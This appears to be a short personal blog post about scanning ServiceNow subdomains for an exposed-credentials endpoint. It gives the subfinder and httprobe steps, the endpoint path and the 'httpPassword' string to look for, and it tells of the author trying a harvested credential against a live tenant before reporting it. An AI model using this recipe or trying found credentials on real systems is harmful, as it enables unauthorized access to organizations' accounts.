ServiceNow admin credentials exposed.

efran
2 min readMar 15, 2021

--

After I reading the blog post on PostSwigger about ServiceNow admin credentials being exposed, I started to wonder if all the credentials have been gathered. I get to work without a moment’s delay, but I realized that I didn’t know how to find subdomains. All I know is, there can be some login credentials on *.service-now.com/HelpTheHelpdesk.jsdbx. I visualized all the steps in my mind.

I have to find the subdomains. ( *.service-now.com). And then send a GET request to /HelpTheHelpdesk.jsdbx endpoint to check the response automatically. The most challenging part of this process was automating the GET request and checking the response.

After quick research, I found subfinder and cloned it. I ran the command below.

subfinder -d service-now.com -o subdomains.txt

But there was a problem that I didn’t know. Not all the subdomains were live and it was impossible to manually determine which ones were live.

`httprobe` save the situation. I gave the subdomains.txt to httprobe and it created a new file called livesubdomains.txt with only the live subdomains.

How would I send a GET request to the endpoint and check the response? I didn’t know though. I Googled it and write my own script with the help of a python request library.

I know that the code is neither the fastest nor efficient one but at least it’s working as intented. I would appreciate any feedback or suggestions you may have.

I receivedmultiple responses that include httpPassword = keyword. But, all except one had empty credentials. httpPassword= ““ and httpUsername = ““. All of these credentials were deleted except one.

No matter how many times I tried to login with these credentials, unfortunately I couldn’t login successfully. Nevertheless, I prepared a proper report and sent it.

I was not the person who discovered that vulnerability, but I wish I were. I learned a lot from the experience and I always strive to learn and share what I know. If you have any feedback, feel free to reach out to me.

--

--

No responses yet